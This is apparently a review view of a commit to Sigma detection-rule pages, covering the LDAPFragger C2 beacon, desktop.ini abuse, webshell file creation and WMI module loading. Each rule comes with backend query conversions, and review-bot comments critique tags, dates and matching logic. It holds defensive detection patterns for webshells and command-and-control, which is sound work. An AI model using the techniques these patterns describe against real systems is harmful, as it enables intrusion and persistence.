| **References** | <ul><li>[https://medium.com/@ivecodoe/detecting-ldapfragger-a-newly-released-cobalt-strike-beacon-using-ldap-for-c2-communication-c274a7f00961](https://medium.com/@ivecodoe/detecting-ldapfragger-a-newly-released-cobalt-strike-beacon-using-ldap-for-c2-communication-c274a7f00961)</li><li>[https://blog.fox-it.com/2020/03/19/ldapfragger-command-and-control-over-ldap-attributes/](https://blog.fox-it.com/2020/03/19/ldapfragger-command-and-control-over-ldap-attributes/)</li><li>[https://github.com/fox-it/LDAPFragger](https://github.com/fox-it/LDAPFragger)</li></ul> |
| **Author** | xknow @xknow_infosec |
## Detection Rules
### Sigma rule
```
title: Suspicious ADSI-Cache Usage By Unknown Tool
id: 75bf09fa-1dd7-4d18-9af9-dd9e492562eb
description: detects the usage of ADSI (LDAP) operations by tools. This may also detect tools like LDAPFragger.
status: experimental
date: 2019/03/24
author: xknow @xknow_infosec
references:
- https://medium.com/@ivecodoe/detecting-ldapfragger-a-newly-released-cobalt-strike-beacon-using-ldap-for-c2-communication-c274a7f00961
- https://blog.fox-it.com/2020/03/19/ldapfragger-command-and-control-over-ldap-attributes/
- https://github.com/fox-it/LDAPFragger
tags:
- attack.t1041
- attack.persistence
logsource:
product: windows
service: sysmon
detection:
selection_1:
EventID: 11
TargetFilename: '*\Local\Microsoft\Windows\SchCache\*.sch'
selection_2:
Image|contains:
- 'C:\windows\system32\svchost.exe'
- 'C:\windows\system32\dllhost.exe'
- 'C:\windows\system32\mmc.exe'
- 'C:\windows\system32\WindowsPowerShell\v1.0\powershell.exe'
condition: selection_1 and not selection_2
falsepositives:
- Other legimate tools, which do ADSI (LDAP) operations, e.g. any remoting activity by MMC, Powershell, Windows etc.
level: high
```
### es-qs
```
((EventID:"11" AND TargetFilename.keyword:*\\\\Local\\\\Microsoft\\\\Windows\\\\SchCache\\*.sch) AND (NOT (Image.keyword:(*C\\:\\\\windows\\\\system32\\\\svchost.exe* OR *C\\:\\\\windows\\\\system32\\\\dllhost.exe* OR *C\\:\\\\windows\\\\system32\\\\mmc.exe* OR *C\\:\\\\windows\\\\system32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe*))))
```
### xpack-watcher
```
curl -s -XPUT -H \'Content-Type: application/json\' --data-binary @- localhost:9200/_watcher/watch/75bf09fa-1dd7-4d18-9af9-dd9e492562eb <<EOF\n{\n "metadata": {\n "title": "Suspicious ADSI-Cache Usage By Unknown Tool",\n "description": "detects the usage of ADSI (LDAP) operations by tools. This may also detect tools like LDAPFragger.",\n "tags": [\n "attack.t1041",\n "attack.persistence"\n ],\n "query": "((EventID:\\"11\\" AND TargetFilename.keyword:*\\\\\\\\Local\\\\\\\\Microsoft\\\\\\\\Windows\\\\\\\\SchCache\\\\*.sch) AND (NOT (Image.keyword:(*C\\\\:\\\\\\\\windows\\\\\\\\system32\\\\\\\\svchost.exe* OR *C\\\\:\\\\\\\\windows\\\\\\\\system32\\\\\\\\dllhost.exe* OR *C\\\\:\\\\\\\\windows\\\\\\\\system32\\\\\\\\mmc.exe* OR *C\\\\:\\\\\\\\windows\\\\\\\\system32\\\\\\\\WindowsPowerShell\\\\\\\\v1.0\\\\\\\\powershell.exe*))))"\n },\n "trigger": {\n "schedule": {\n "interval": "30m"\n }\n },\n "input": {\n "search": {\n "request": {\n "body": {\n "size": 0,\n "query": {\n "bool": {\n "must": [\n {\n "query_string": {\n "query": "((EventID:\\"11\\" AND TargetFilename.keyword:*\\\\\\\\Local\\\\\\\\Microsoft\\\\\\\\Windows\\\\\\\\SchCache\\\\*.sch) AND (NOT (Image.keyword:(*C\\\\:\\\\\\\\windows\\\\\\\\system32\\\\\\\\svchost.exe* OR *C\\\\:\\\\\\\\windows\\\\\\\\system32\\\\\\\\dllhost.exe* OR *C\\\\:\\\\\\\\windows\\\\\\\\system32\\\\\\\\mmc.exe* OR *C\\\\:\\\\\\\\windows\\\\\\\\system32\\\\\\\\WindowsPowerShell\\\\\\\\v1.0\\\\\\\\powershell.exe*))))",\n "analyze_wildcard": true\n }\n }\n ],\n "filter": {\n "range": {\n "timestamp": {\n "gte": "now-30m/m"\n }\n }\n }\n }\n }\n },\n "indices": []\n }\n }\n },\n "condition": {\n "compare": {\n "ctx.payload.hits.total": {\n "not_eq": 0\n }\n }\n },\n "actions": {\n "send_email": {\n "email": {\n "to": "root@localhost",\n "subject": "Sigma Rule \'Suspicious ADSI-Cache Usage By Unknown Tool\'",\n "body": 
"Hits:\\n{{#ctx.payload.hits.hits}}{{_source}}\\n================================================================================\\n{{/ctx.payload.hits.hits}}",\n "attachments": {\n "data.json": {\n "data": {\n "format": "json"\n }\n }\n }\n }\n }\n }\n}\nEOF\n
```
### graylog
```
((EventID:"11" AND TargetFilename.keyword:*\\\\Local\\\\Microsoft\\\\Windows\\\\SchCache\\*.sch) AND (NOT (Image.keyword:(*C\\:\\\\windows\\\\system32\\\\svchost.exe* *C\\:\\\\windows\\\\system32\\\\dllhost.exe* *C\\:\\\\windows\\\\system32\\\\mmc.exe* *C\\:\\\\windows\\\\system32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe*))))
```
### splunk
```
((EventID="11" TargetFilename="*\\\\Local\\\\Microsoft\\\\Windows\\\\SchCache\\*.sch") NOT ((Image="*C:\\\\windows\\\\system32\\\\svchost.exe*" OR Image="*C:\\\\windows\\\\system32\\\\dllhost.exe*" OR Image="*C:\\\\windows\\\\system32\\\\mmc.exe*" OR Image="*C:\\\\windows\\\\system32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe*")))
```
### logpoint
```
((event_id="11" TargetFilename="*\\\\Local\\\\Microsoft\\\\Windows\\\\SchCache\\*.sch") -(Image IN ["*C:\\\\windows\\\\system32\\\\svchost.exe*", "*C:\\\\windows\\\\system32\\\\dllhost.exe*", "*C:\\\\windows\\\\system32\\\\mmc.exe*", "*C:\\\\windows\\\\system32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe*"]))
```
### grep
```
grep -P '^(?:.*(?=.*(?:.*(?=.*11)(?=.*.*\\Local\\Microsoft\\Windows\\SchCache\\.*\\.sch)))(?=.*(?!.*(?:.*(?=.*(?:.*.*C:\\windows\\system32\\svchost\\.exe.*|.*.*C:\\windows\\system32\\dllhost\\.exe.*|.*.*C:\\windows\\system32\\mmc\\.exe.*|.*.*C:\\windows\\system32\\WindowsPowerShell\\v1\\.0\\powershell\\.exe.*))))))'
```
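Review bot: The ATT&CK mapping is internally inconsistent: the tags pair `attack.persistence` with `attack.t1041` (Exfiltration Over Command and Control Channel), so the table ends up showing a Persistence tactic next to an Exfiltration technique, and LDAPFragger, which all three references describe, is a command-and-control channel over LDAP attributes rather than either. `attack.command_and_control` is the tactic that fits what the rule observes. The `date: 2019/03/24` also predates the Fox-IT and Medium references from March 2020, so it is very likely a typo for 2020/03/24. Smaller points: `Image|contains` on full paths works, but `Image` is an exact path in Sysmon, so a plain value list or `endswith` expresses the intent better; "legimate" should be "legitimate" in both the table and the rule; and "detects" should be capitalized at the start of the description.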

View File

@ -0,0 +1,96 @@
| Title | Suspicious desktop.ini Action |
|:-------------------------|:------------------|
| **Description** | Detects unusual processes accessing desktop.ini, which can be leveraged to alter how Explorer displays a folder's content (i.e. renaming files) without changing them on disk. |
| **ATT&amp;CK Tactic** | <ul><li>[TA0003: Persistence](https://attack.mitre.org/tactics/TA0003)</li></ul> |
| **ATT&amp;CK Technique** | <ul><li>[T1023: Shortcut Modification](https://attack.mitre.org/techniques/T1023)</li></ul> |
| **Data Needed** | <ul><li>[DN_0015_11_windows_sysmon_FileCreate](../Data_Needed/DN_0015_11_windows_sysmon_FileCreate.md)</li></ul> |
| **Trigger** | <ul><li>[T1023: Shortcut Modification](../Triggers/T1023.md)</li></ul> |
| **Severity Level** | medium |
| **False Positives** | <ul><li>Operations performed through Windows SCCM or equivalent</li></ul> |
| **Development Status** | experimental |
| **References** | <ul><li>[https://isc.sans.edu/forums/diary/Desktopini+as+a+postexploitation+tool/25912/](https://isc.sans.edu/forums/diary/Desktopini+as+a+postexploitation+tool/25912/)</li></ul> |
| **Author** | Maxime Thiebaut (@0xThiebaut) |
## Detection Rules
### Sigma rule
```
title: Suspicious desktop.ini Action
id: 81315b50-6b60-4d8f-9928-3466e1022515
status: experimental
description: Detects unusual processes accessing desktop.ini, which can be leveraged to alter how Explorer displays a folder's content (i.e. renaming files) without changing them on disk.
references:
- https://isc.sans.edu/forums/diary/Desktopini+as+a+postexploitation+tool/25912/
author: Maxime Thiebaut (@0xThiebaut)
date: 2020/03/19
tags:
- attack.persistence
- attack.t1023
logsource:
product: windows
service: sysmon
detection:
filter:
Image:
- 'C:\Windows\explorer.exe'
- 'C:\Windows\System32\msiexec.exe'
- 'C:\Windows\System32\mmc.exe'
selection:
EventID: 11
TargetFilename|endswith: '\desktop.ini'
condition: selection and not filter
falsepositives:
- Operations performed through Windows SCCM or equivalent
level: medium
```
### es-qs
```
((EventID:"11" AND TargetFilename.keyword:*\\\\desktop.ini) AND (NOT (Image:("C\\:\\\\Windows\\\\explorer.exe" OR "C\\:\\\\Windows\\\\System32\\\\msiexec.exe" OR "C\\:\\\\Windows\\\\System32\\\\mmc.exe"))))
```
### xpack-watcher
```
curl -s -XPUT -H \'Content-Type: application/json\' --data-binary @- localhost:9200/_watcher/watch/81315b50-6b60-4d8f-9928-3466e1022515 <<EOF\n{\n "metadata": {\n "title": "Suspicious desktop.ini Action",\n "description": "Detects unusual processes accessing desktop.ini, which can be leveraged to alter how Explorer displays a folder\'s content (i.e. renaming files) without changing them on disk.",\n "tags": [\n "attack.persistence",\n "attack.t1023"\n ],\n "query": "((EventID:\\"11\\" AND TargetFilename.keyword:*\\\\\\\\desktop.ini) AND (NOT (Image:(\\"C\\\\:\\\\\\\\Windows\\\\\\\\explorer.exe\\" OR \\"C\\\\:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\msiexec.exe\\" OR \\"C\\\\:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\mmc.exe\\"))))"\n },\n "trigger": {\n "schedule": {\n "interval": "30m"\n }\n },\n "input": {\n "search": {\n "request": {\n "body": {\n "size": 0,\n "query": {\n "bool": {\n "must": [\n {\n "query_string": {\n "query": "((EventID:\\"11\\" AND TargetFilename.keyword:*\\\\\\\\desktop.ini) AND (NOT (Image:(\\"C\\\\:\\\\\\\\Windows\\\\\\\\explorer.exe\\" OR \\"C\\\\:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\msiexec.exe\\" OR \\"C\\\\:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\mmc.exe\\"))))",\n "analyze_wildcard": true\n }\n }\n ],\n "filter": {\n "range": {\n "timestamp": {\n "gte": "now-30m/m"\n }\n }\n }\n }\n }\n },\n "indices": []\n }\n }\n },\n "condition": {\n "compare": {\n "ctx.payload.hits.total": {\n "not_eq": 0\n }\n }\n },\n "actions": {\n "send_email": {\n "email": {\n "to": "root@localhost",\n "subject": "Sigma Rule \'Suspicious desktop.ini Action\'",\n "body": "Hits:\\n{{#ctx.payload.hits.hits}}{{_source}}\\n================================================================================\\n{{/ctx.payload.hits.hits}}",\n "attachments": {\n "data.json": {\n "data": {\n "format": "json"\n }\n }\n }\n }\n }\n }\n}\nEOF\n
```
### graylog
```
((EventID:"11" AND TargetFilename.keyword:*\\\\desktop.ini) AND (NOT (Image:("C\\:\\\\Windows\\\\explorer.exe" "C\\:\\\\Windows\\\\System32\\\\msiexec.exe" "C\\:\\\\Windows\\\\System32\\\\mmc.exe"))))
```
### splunk
```
((EventID="11" TargetFilename="*\\\\desktop.ini") NOT ((Image="C:\\\\Windows\\\\explorer.exe" OR Image="C:\\\\Windows\\\\System32\\\\msiexec.exe" OR Image="C:\\\\Windows\\\\System32\\\\mmc.exe")))
```
### logpoint
```
((event_id="11" TargetFilename="*\\\\desktop.ini") -(Image IN ["C:\\\\Windows\\\\explorer.exe", "C:\\\\Windows\\\\System32\\\\msiexec.exe", "C:\\\\Windows\\\\System32\\\\mmc.exe"]))
```
### grep
```
grep -P '^(?:.*(?=.*(?:.*(?=.*11)(?=.*.*\\desktop\\.ini)))(?=.*(?!.*(?:.*(?=.*(?:.*C:\\Windows\\explorer\\.exe|.*C:\\Windows\\System32\\msiexec\\.exe|.*C:\\Windows\\System32\\mmc\\.exe))))))'
```
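Review bot: the `filter` entries (`C:\Windows\explorer.exe`, `C:\Windows\System32\msiexec.exe`, `C:\Windows\System32\mmc.exe`) are exact-path matches, and the es-qs/graylog output compares `Image` as a `.keyword` field, so the exclusion is both case-sensitive and drive-letter specific; an `Image` reported as `C:\WINDOWS\explorer.exe` or a system installed on `D:` slips past it and the rule raises medium-severity noise for ordinary Explorer activity. Suggest `Image|endswith: '\explorer.exe'` (and likewise for the other two) to make the filter robust. A `definition:` line under `logsource` should also state that Sysmon must carry a FileCreate include rule covering `desktop.ini`, because event 11 is only emitted for files the Sysmon configuration lists; without that note the rule deploys cleanly and silently collects nothing.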

View File

@ -27,7 +27,7 @@ author: Florian Roth, Markus Neis
tags:
- attack.persistence
- attack.t1060
date: 2018/25/08
date: 2018/08/25
modified: 2020/02/26
logsource:
product: windows
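Review bot: `modified: 2020/02/26` is left as is although the rule file changes in this commit; Sigma convention is to bump `modified` on every edit, including metadata corrections such as this `date` fix, so that consumers that key on that field pick the change up. The same applies to the `date` correction in the following file, whose `modified: 2019/11/13` is also untouched.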

View File

@ -25,7 +25,7 @@ description: Offensive tradecraft is switching away from using APIs like "Create
notes:
- MonitoringHost.exe is a process that loads .NET CLR by default and thus a favorite for process injection for .NET in-memory offensive tools.
status: experimental
date: 27/10/2019
date: 2019/10/27
modified: 2019/11/13
author: Perez Diego (@darkquassar), oscd.community
references:

View File

@ -1,6 +1,6 @@
| Title | Windows Webshell Creation |
|:-------------------------|:------------------|
| **Description** | Posible webshell file creation on a static web site |
| **Description** | Possible webshell file creation on a static web site |
| **ATT&amp;CK Tactic** | <ul><li>[TA0003: Persistence](https://attack.mitre.org/tactics/TA0003)</li></ul> |
| **ATT&amp;CK Technique** | <ul><li>[T1100: Web Shell](https://attack.mitre.org/techniques/T1100)</li></ul> |
| **Data Needed** | <ul><li>[DN_0015_11_windows_sysmon_FileCreate](../Data_Needed/DN_0015_11_windows_sysmon_FileCreate.md)</li></ul> |
@ -20,7 +20,7 @@
title: Windows Webshell Creation
id: 39f1f9f2-9636-45de-98f6-a4046aa8e4b9
status: experimental
description: Posible webshell file creation on a static web site
description: Possible webshell file creation on a static web site
references:
- PT ESC rule and personal experience
author: Beyu Denis, oscd.community
@ -77,7 +77,7 @@ falsepositives:
### xpack-watcher
```
curl -s -XPUT -H \'Content-Type: application/json\' --data-binary @- localhost:9200/_watcher/watch/39f1f9f2-9636-45de-98f6-a4046aa8e4b9 <<EOF\n{\n "metadata": {\n "title": "Windows Webshell Creation",\n "description": "Posible webshell file creation on a static web site",\n "tags": [\n "attack.persistence",\n "attack.t1100"\n ],\n "query": "(EventID:\\"11\\" AND ((TargetFilename.keyword:*\\\\\\\\inetpub\\\\\\\\wwwroot\\\\* AND TargetFilename.keyword:(*.asp* OR *.ashx* OR *.ph*)) OR (TargetFilename.keyword:(*\\\\\\\\www\\\\* OR *\\\\\\\\htdocs\\\\* OR *\\\\\\\\html\\\\*) AND TargetFilename.keyword:*.ph*) OR TargetFilename.keyword:*.jsp OR (TargetFilename.keyword:*\\\\\\\\cgi\\\\-bin\\\\* AND TargetFilename.keyword:*.pl*)))"\n },\n "trigger": {\n "schedule": {\n "interval": "30m"\n }\n },\n "input": {\n "search": {\n "request": {\n "body": {\n "size": 0,\n "query": {\n "bool": {\n "must": [\n {\n "query_string": {\n "query": "(EventID:\\"11\\" AND ((TargetFilename.keyword:*\\\\\\\\inetpub\\\\\\\\wwwroot\\\\* AND TargetFilename.keyword:(*.asp* OR *.ashx* OR *.ph*)) OR (TargetFilename.keyword:(*\\\\\\\\www\\\\* OR *\\\\\\\\htdocs\\\\* OR *\\\\\\\\html\\\\*) AND TargetFilename.keyword:*.ph*) OR TargetFilename.keyword:*.jsp OR (TargetFilename.keyword:*\\\\\\\\cgi\\\\-bin\\\\* AND TargetFilename.keyword:*.pl*)))",\n "analyze_wildcard": true\n }\n }\n ],\n "filter": {\n "range": {\n "timestamp": {\n "gte": "now-30m/m"\n }\n }\n }\n }\n }\n },\n "indices": []\n }\n }\n },\n "condition": {\n "compare": {\n "ctx.payload.hits.total": {\n "not_eq": 0\n }\n }\n },\n "actions": {\n "send_email": {\n "email": {\n "to": "root@localhost",\n "subject": "Sigma Rule \'Windows Webshell Creation\'",\n "body": "Hits:\\n{{#ctx.payload.hits.hits}}{{_source}}\\n================================================================================\\n{{/ctx.payload.hits.hits}}",\n "attachments": {\n "data.json": {\n "data": {\n "format": "json"\n }\n }\n }\n }\n }\n }\n}\nEOF\n
curl -s -XPUT -H \'Content-Type: application/json\' --data-binary @- localhost:9200/_watcher/watch/39f1f9f2-9636-45de-98f6-a4046aa8e4b9 <<EOF\n{\n "metadata": {\n "title": "Windows Webshell Creation",\n "description": "Possible webshell file creation on a static web site",\n "tags": [\n "attack.persistence",\n "attack.t1100"\n ],\n "query": "(EventID:\\"11\\" AND ((TargetFilename.keyword:*\\\\\\\\inetpub\\\\\\\\wwwroot\\\\* AND TargetFilename.keyword:(*.asp* OR *.ashx* OR *.ph*)) OR (TargetFilename.keyword:(*\\\\\\\\www\\\\* OR *\\\\\\\\htdocs\\\\* OR *\\\\\\\\html\\\\*) AND TargetFilename.keyword:*.ph*) OR TargetFilename.keyword:*.jsp OR (TargetFilename.keyword:*\\\\\\\\cgi\\\\-bin\\\\* AND TargetFilename.keyword:*.pl*)))"\n },\n "trigger": {\n "schedule": {\n "interval": "30m"\n }\n },\n "input": {\n "search": {\n "request": {\n "body": {\n "size": 0,\n "query": {\n "bool": {\n "must": [\n {\n "query_string": {\n "query": "(EventID:\\"11\\" AND ((TargetFilename.keyword:*\\\\\\\\inetpub\\\\\\\\wwwroot\\\\* AND TargetFilename.keyword:(*.asp* OR *.ashx* OR *.ph*)) OR (TargetFilename.keyword:(*\\\\\\\\www\\\\* OR *\\\\\\\\htdocs\\\\* OR *\\\\\\\\html\\\\*) AND TargetFilename.keyword:*.ph*) OR TargetFilename.keyword:*.jsp OR (TargetFilename.keyword:*\\\\\\\\cgi\\\\-bin\\\\* AND TargetFilename.keyword:*.pl*)))",\n "analyze_wildcard": true\n }\n }\n ],\n "filter": {\n "range": {\n "timestamp": {\n "gte": "now-30m/m"\n }\n }\n }\n }\n }\n },\n "indices": []\n }\n }\n },\n "condition": {\n "compare": {\n "ctx.payload.hits.total": {\n "not_eq": 0\n }\n }\n },\n "actions": {\n "send_email": {\n "email": {\n "to": "root@localhost",\n "subject": "Sigma Rule \'Windows Webshell Creation\'",\n "body": "Hits:\\n{{#ctx.payload.hits.hits}}{{_source}}\\n================================================================================\\n{{/ctx.payload.hits.hits}}",\n "attachments": {\n "data.json": {\n "data": {\n "format": "json"\n }\n }\n }\n }\n }\n }\n}\nEOF\n
```
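Review bot: the extension wildcards in the query above are inconsistent: `*.asp*`, `*.ashx*`, `*.ph*` and `*.pl*` carry a trailing wildcard (so `*.ph*` also matches names such as `report.phase1.txt` under `htdocs`, and `*.pl*` matches `.plist`), while `*.jsp` has none and therefore misses `.jspx`. Suggest enumerating the intended extensions explicitly (`.php`, `.phtml`, `.jsp`, `.jspx`, `.asp`, `.aspx`, `.ashx`, `.pl`) with an `|endswith` modifier in the rule source so that every generated backend query neither over- nor under-matches.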

View File

@ -48,6 +48,7 @@ detection:
filter:
Image|endswith:
- '\WmiPrvSe.exe'
- '\WmiPrvSE.exe'
- '\WmiAPsrv.exe'
- '\svchost.exe'
condition: selection and not filter
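Review bot: adding `\WmiPrvSE.exe` beside `\WmiPrvSe.exe` works around case-sensitive backends (Elasticsearch `.keyword` fields, the grep output) rather than fixing the cause, and it is incomplete: an `Image` reported as `WMIPRVSE.EXE` or `wmiprvse.exe` by another collector still bypasses the filter, and the same problem applies to `\WmiAPsrv.exe`. Suggest keeping a single value and normalizing case at ingest (or matching on a lower-cased copy field) for the case-sensitive backends; for Splunk and Logpoint, which compare case-insensitively, the duplicate is harmless but redundant.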
@ -69,42 +70,42 @@ level: high
### es-qs
```
((EventID:"7" AND ImageLoaded.keyword:(*\\\\wmiclnt.dll OR *\\\\WmiApRpl.dll OR *\\\\wmiprov.dll OR *\\\\wmiutils.dll OR *\\\\wbemcomn.dll OR *\\\\wbemprox.dll OR *\\\\WMINet_Utils.dll OR *\\\\wbemsvc.dll OR *\\\\fastprox.dll)) AND (NOT (Image.keyword:(*\\\\WmiPrvSe.exe OR *\\\\WmiAPsrv.exe OR *\\\\svchost.exe))))
((EventID:"7" AND ImageLoaded.keyword:(*\\\\wmiclnt.dll OR *\\\\WmiApRpl.dll OR *\\\\wmiprov.dll OR *\\\\wmiutils.dll OR *\\\\wbemcomn.dll OR *\\\\wbemprox.dll OR *\\\\WMINet_Utils.dll OR *\\\\wbemsvc.dll OR *\\\\fastprox.dll)) AND (NOT (Image.keyword:(*\\\\WmiPrvSe.exe OR *\\\\WmiPrvSE.exe OR *\\\\WmiAPsrv.exe OR *\\\\svchost.exe))))
```
### xpack-watcher
```
curl -s -XPUT -H \'Content-Type: application/json\' --data-binary @- localhost:9200/_watcher/watch/671bb7e3-a020-4824-a00e-2ee5b55f385e <<EOF\n{\n "metadata": {\n "title": "WMI Modules Loaded",\n "description": "Detects non wmiprvse loading WMI modules",\n "tags": [\n "attack.execution",\n "attack.t1047"\n ],\n "query": "((EventID:\\"7\\" AND ImageLoaded.keyword:(*\\\\\\\\wmiclnt.dll OR *\\\\\\\\WmiApRpl.dll OR *\\\\\\\\wmiprov.dll OR *\\\\\\\\wmiutils.dll OR *\\\\\\\\wbemcomn.dll OR *\\\\\\\\wbemprox.dll OR *\\\\\\\\WMINet_Utils.dll OR *\\\\\\\\wbemsvc.dll OR *\\\\\\\\fastprox.dll)) AND (NOT (Image.keyword:(*\\\\\\\\WmiPrvSe.exe OR *\\\\\\\\WmiAPsrv.exe OR *\\\\\\\\svchost.exe))))"\n },\n "trigger": {\n "schedule": {\n "interval": "30m"\n }\n },\n "input": {\n "search": {\n "request": {\n "body": {\n "size": 0,\n "query": {\n "bool": {\n "must": [\n {\n "query_string": {\n "query": "((EventID:\\"7\\" AND ImageLoaded.keyword:(*\\\\\\\\wmiclnt.dll OR *\\\\\\\\WmiApRpl.dll OR *\\\\\\\\wmiprov.dll OR *\\\\\\\\wmiutils.dll OR *\\\\\\\\wbemcomn.dll OR *\\\\\\\\wbemprox.dll OR *\\\\\\\\WMINet_Utils.dll OR *\\\\\\\\wbemsvc.dll OR *\\\\\\\\fastprox.dll)) AND (NOT (Image.keyword:(*\\\\\\\\WmiPrvSe.exe OR *\\\\\\\\WmiAPsrv.exe OR *\\\\\\\\svchost.exe))))",\n "analyze_wildcard": true\n }\n }\n ],\n "filter": {\n "range": {\n "timestamp": {\n "gte": "now-30m/m"\n }\n }\n }\n }\n }\n },\n "indices": []\n }\n }\n },\n "condition": {\n "compare": {\n "ctx.payload.hits.total": {\n "not_eq": 0\n }\n }\n },\n "actions": {\n "send_email": {\n "email": {\n "to": "root@localhost",\n "subject": "Sigma Rule \'WMI Modules Loaded\'",\n "body": "Hits:\\n{{#ctx.payload.hits.hits}}Hit on {{_source.@timestamp}}:\\nComputerName = {{_source.ComputerName}}\\n User = {{_source.User}}\\n Image = {{_source.Image}}\\n ImageLoaded = {{_source.ImageLoaded}}================================================================================\\n{{/ctx.payload.hits.hits}}",\n "attachments": {\n "data.json": 
{\n "data": {\n "format": "json"\n }\n }\n }\n }\n }\n }\n}\nEOF\n
curl -s -XPUT -H \'Content-Type: application/json\' --data-binary @- localhost:9200/_watcher/watch/671bb7e3-a020-4824-a00e-2ee5b55f385e <<EOF\n{\n "metadata": {\n "title": "WMI Modules Loaded",\n "description": "Detects non wmiprvse loading WMI modules",\n "tags": [\n "attack.execution",\n "attack.t1047"\n ],\n "query": "((EventID:\\"7\\" AND ImageLoaded.keyword:(*\\\\\\\\wmiclnt.dll OR *\\\\\\\\WmiApRpl.dll OR *\\\\\\\\wmiprov.dll OR *\\\\\\\\wmiutils.dll OR *\\\\\\\\wbemcomn.dll OR *\\\\\\\\wbemprox.dll OR *\\\\\\\\WMINet_Utils.dll OR *\\\\\\\\wbemsvc.dll OR *\\\\\\\\fastprox.dll)) AND (NOT (Image.keyword:(*\\\\\\\\WmiPrvSe.exe OR *\\\\\\\\WmiPrvSE.exe OR *\\\\\\\\WmiAPsrv.exe OR *\\\\\\\\svchost.exe))))"\n },\n "trigger": {\n "schedule": {\n "interval": "30m"\n }\n },\n "input": {\n "search": {\n "request": {\n "body": {\n "size": 0,\n "query": {\n "bool": {\n "must": [\n {\n "query_string": {\n "query": "((EventID:\\"7\\" AND ImageLoaded.keyword:(*\\\\\\\\wmiclnt.dll OR *\\\\\\\\WmiApRpl.dll OR *\\\\\\\\wmiprov.dll OR *\\\\\\\\wmiutils.dll OR *\\\\\\\\wbemcomn.dll OR *\\\\\\\\wbemprox.dll OR *\\\\\\\\WMINet_Utils.dll OR *\\\\\\\\wbemsvc.dll OR *\\\\\\\\fastprox.dll)) AND (NOT (Image.keyword:(*\\\\\\\\WmiPrvSe.exe OR *\\\\\\\\WmiPrvSE.exe OR *\\\\\\\\WmiAPsrv.exe OR *\\\\\\\\svchost.exe))))",\n "analyze_wildcard": true\n }\n }\n ],\n "filter": {\n "range": {\n "timestamp": {\n "gte": "now-30m/m"\n }\n }\n }\n }\n }\n },\n "indices": []\n }\n }\n },\n "condition": {\n "compare": {\n "ctx.payload.hits.total": {\n "not_eq": 0\n }\n }\n },\n "actions": {\n "send_email": {\n "email": {\n "to": "root@localhost",\n "subject": "Sigma Rule \'WMI Modules Loaded\'",\n "body": "Hits:\\n{{#ctx.payload.hits.hits}}Hit on {{_source.@timestamp}}:\\nComputerName = {{_source.ComputerName}}\\n User = {{_source.User}}\\n Image = {{_source.Image}}\\n ImageLoaded = 
{{_source.ImageLoaded}}================================================================================\\n{{/ctx.payload.hits.hits}}",\n "attachments": {\n "data.json": {\n "data": {\n "format": "json"\n }\n }\n }\n }\n }\n }\n}\nEOF\n
```
### graylog
```
((EventID:"7" AND ImageLoaded.keyword:(*\\\\wmiclnt.dll *\\\\WmiApRpl.dll *\\\\wmiprov.dll *\\\\wmiutils.dll *\\\\wbemcomn.dll *\\\\wbemprox.dll *\\\\WMINet_Utils.dll *\\\\wbemsvc.dll *\\\\fastprox.dll)) AND (NOT (Image.keyword:(*\\\\WmiPrvSe.exe *\\\\WmiAPsrv.exe *\\\\svchost.exe))))
((EventID:"7" AND ImageLoaded.keyword:(*\\\\wmiclnt.dll *\\\\WmiApRpl.dll *\\\\wmiprov.dll *\\\\wmiutils.dll *\\\\wbemcomn.dll *\\\\wbemprox.dll *\\\\WMINet_Utils.dll *\\\\wbemsvc.dll *\\\\fastprox.dll)) AND (NOT (Image.keyword:(*\\\\WmiPrvSe.exe *\\\\WmiPrvSE.exe *\\\\WmiAPsrv.exe *\\\\svchost.exe))))
```
### splunk
```
((EventID="7" (ImageLoaded="*\\\\wmiclnt.dll" OR ImageLoaded="*\\\\WmiApRpl.dll" OR ImageLoaded="*\\\\wmiprov.dll" OR ImageLoaded="*\\\\wmiutils.dll" OR ImageLoaded="*\\\\wbemcomn.dll" OR ImageLoaded="*\\\\wbemprox.dll" OR ImageLoaded="*\\\\WMINet_Utils.dll" OR ImageLoaded="*\\\\wbemsvc.dll" OR ImageLoaded="*\\\\fastprox.dll")) NOT ((Image="*\\\\WmiPrvSe.exe" OR Image="*\\\\WmiAPsrv.exe" OR Image="*\\\\svchost.exe"))) | table ComputerName,User,Image,ImageLoaded
((EventID="7" (ImageLoaded="*\\\\wmiclnt.dll" OR ImageLoaded="*\\\\WmiApRpl.dll" OR ImageLoaded="*\\\\wmiprov.dll" OR ImageLoaded="*\\\\wmiutils.dll" OR ImageLoaded="*\\\\wbemcomn.dll" OR ImageLoaded="*\\\\wbemprox.dll" OR ImageLoaded="*\\\\WMINet_Utils.dll" OR ImageLoaded="*\\\\wbemsvc.dll" OR ImageLoaded="*\\\\fastprox.dll")) NOT ((Image="*\\\\WmiPrvSe.exe" OR Image="*\\\\WmiPrvSE.exe" OR Image="*\\\\WmiAPsrv.exe" OR Image="*\\\\svchost.exe"))) | table ComputerName,User,Image,ImageLoaded
```
### logpoint
```
((event_id="7" ImageLoaded IN ["*\\\\wmiclnt.dll", "*\\\\WmiApRpl.dll", "*\\\\wmiprov.dll", "*\\\\wmiutils.dll", "*\\\\wbemcomn.dll", "*\\\\wbemprox.dll", "*\\\\WMINet_Utils.dll", "*\\\\wbemsvc.dll", "*\\\\fastprox.dll"]) -(Image IN ["*\\\\WmiPrvSe.exe", "*\\\\WmiAPsrv.exe", "*\\\\svchost.exe"]))
((event_id="7" ImageLoaded IN ["*\\\\wmiclnt.dll", "*\\\\WmiApRpl.dll", "*\\\\wmiprov.dll", "*\\\\wmiutils.dll", "*\\\\wbemcomn.dll", "*\\\\wbemprox.dll", "*\\\\WMINet_Utils.dll", "*\\\\wbemsvc.dll", "*\\\\fastprox.dll"]) -(Image IN ["*\\\\WmiPrvSe.exe", "*\\\\WmiPrvSE.exe", "*\\\\WmiAPsrv.exe", "*\\\\svchost.exe"]))
```
### grep
```
